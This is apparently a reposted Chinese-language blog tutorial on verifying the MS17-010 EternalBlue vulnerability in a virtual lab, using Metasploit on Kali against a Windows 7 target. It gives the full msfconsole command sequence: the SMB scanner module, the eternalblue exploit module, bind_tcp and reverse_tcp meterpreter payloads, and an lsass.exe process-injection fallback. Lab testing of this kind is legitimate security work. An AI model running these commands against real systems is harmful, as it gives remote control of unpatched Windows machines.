MS17-010永恆之藍驗證


一、安裝MSF,windows下安裝也可以,直接安裝kali也可以,我是kali是攻擊主機,win7是靶機,都在虛擬機里。

1、windows下安裝MSF請參考:http://blog.csdn.net/wangsy0202/article/details/51914748(https://www.metasploit.com/官網下載)

2、kali的安裝請直接去官網下載:https://www.kali.org/downloads/

3、漏洞攻擊文章請參考:https://bbs.ichunqiu.com/thread-23115-1-1.html

准備時候還是要說一下注意事項:

(1)請安裝相關ruby插件:

安裝過程是:打開msfconsole 然后輸入命令:

1 gem install ruby_smb

(2)一定要搞清楚win7主機防火牆和共享服務配置445需要open 

(3)網絡環境要搞清楚,是否有訪問策略 是否有域認證等等,想明白了就像誰能發起連接。

#攻擊機可以主動發起連接,請使用正向payload windows/x64/meterpreter/bind_tcp

#雙向都可以主動發起連接的,請隨意。(反向的windows/x64/meterpreter/reverse_tcp)

#雙向都不可以的,或者攻擊機不可以的那就別玩了。

(4)可以先掃描看看是否有漏洞

1 use auxiliary/scanner/smb/smb_ms17_010
2 set RHOSTS [targetip]
3 run

 

二、開始攻擊:

1 msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue 
2 msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp 
3 msf exploit(ms17_010_eternalblue) > set RHOST 192.168.177.129
4 msf exploit(ms17_010_eternalblue) > set LHOST 192.168.177.135
5 msf exploit(ms17_010_eternalblue) > exploit

 

 

 搞定收工

如果不行,麻煩加上這句:

1 set PROCESSINJECT   lsass.exe
2 set TARGETARCHITECTURE x64

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM